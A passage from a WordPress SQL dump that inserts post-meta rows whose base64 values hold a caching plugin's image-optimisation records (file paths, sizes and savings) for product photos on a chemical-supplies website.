3d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb24tcmVzaW4tMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjozOTksInRpbWUiOjE0ODM1ODU0NzMsImlkIjo2MzB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Vwb24tcmVzaW4tMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQyMCwidGltZSI6MTQ4MzU4NTQ3NywiaWQiOjYzMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb24tcmVzaW4tMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NDk2LCJ0aW1lIjoxNDgzNTg1NDgwLCJpZCI6NjMwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Vwb24tcmVzaW4tMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo1MjcsInRpbWUiOjE0ODM1ODU0ODMsImlkIjo2MzB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FcG9uLXJlc2luLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRXBvbi1yZXNpbi00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Vwb24tcmVzaW4tNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjYzOSwidGltZSI6MTQ4MzU4NTQ4NywiaWQiOjYzMH1d'); 
INSERT INTO `wp_postmeta` VALUES (30129, 619, 'wpfc_optimisation_reduction', '493787'); 
INSERT INTO `wp_postmeta` VALUES (30130, 619, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci5qcGciLCJ3aWR0aCI6NDAwMCwiaGVpZ2h0Ijo0MDAwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXIuanBnIiwicmVkdWN0aW9uIjo0OTMyNzAsInRpbWUiOjE0ODM1ODU0OTcsImlkIjoiNjE5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC1jb2F0aW5nLXN0cmlwcGVyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU1MDAsImlkIjo2MTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXItODAweDgwMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjgwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci04MDB4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC1jb2F0aW5nLXN0cmlwcGVyLTgwMHg4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NTAyLCJpZCI6NjE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC1jb2F0aW5nLXN0cmlwcGVyLTc2OHg3NjguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo3NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXItNzY4eDc2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci03Njh4NzY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTUwNiwiaWQiOjYxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci0xNjAweDE2MDAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci0xNjAweDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXItMTYwMHgxNjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTUwOSwiaWQiOjYxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC1jb2F0aW5nLXN0cmlwcGVyLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU1MTIsImlkIjo2MTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC1jb2F0aW5nLXN0cmlwcGVyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NTE0LCJpZCI6NjE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC1jb2F0aW5nLXN0cmlwcGVyLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTUxNywiaWQiOjYxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC1jb2F0aW5nLXN0cmlwcGVyLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU1MjAsImlkIjo2MTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC1jb2F0aW5nLXN0cmlwcGVyLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjI2MSwidGltZSI6MTQ4MzU4NTUyMiwiaWQiOjYxOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0NvbmZvcm1hbC1jb2F0aW5nLXN0cmlwcGVyLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MjQ1LCJ0aW1lIjoxNDgzNTg1NTI1LCJpZCI6NjE5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXItMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC1jb2F0aW5nLXN0cmlwcGVyLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NTI4LCJpZCI6NjE5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC1jb2F0aW5nLXN0cmlwcGVyLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NTMwLCJpZCI6NjE5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQ29uZm9ybWFsLWNvYXRpbmctc3RyaXBwZXItNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Db25mb3JtYWwtY29hdGluZy1zdHJpcHBlci00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0NvbmZvcm1hbC1jb2F0aW5nLXN0cmlwcGVyLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NTMzLCJpZCI6NjE5fV0='); 
INSERT INTO `wp_postmeta` VALUES (30131, 618, 'wpfc_optimisation_reduction', '15199'); 
INSERT INTO `wp_postmeta` VALUES (30132, 618, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFybmlzaC1jb2F0aW5nLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFybmlzaC1jb2F0aW5nLmpwZyIsIndpZHRoIjo0NzUyLCJoZWlnaHQiOjMxNjgsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1ODU1MzgsImlkIjoiNjE4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXJuaXNoLWNvYXRpbmctMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXJuaXNoLWNvYXRpbmctMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXJuaXNoLWNvYXRpbmctMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjYyOSwidGltZSI6MTQ4MzU4NTU0MSwiaWQiOjYxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXJuaXNoLWNvYXRpbmctODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXJuaXNoLWNvYXRpbmctODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WYXJuaXNoLWNvYXRpbmctODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEzNTYsInRpbWUiOjE0ODM1ODU1NDUsImlkIjo2MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFybmlzaC1jb2F0aW5nLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVmFybmlzaC1jb2F0aW5nLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVmFybmlzaC1jb2F0aW5nLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxMTk5LCJ0aW1lIjoxNDgzNTg1NTQ5LCJpZCI6NjE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WYXJuaXNoLWNvYXRpbmctMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo1MDE3LCJ0aW1lIjoxNDgzNTg1NTU0LCJpZCI6NjE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTQ0LCJ0aW1lIjoxNDgzNTg1NTU3LCJpZCI6NjE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQ2LCJ0aW1lIjoxNDgzNTg1NTYxLCJpZCI6NjE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hdGluZy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1Zhcm5pc2gtY29hd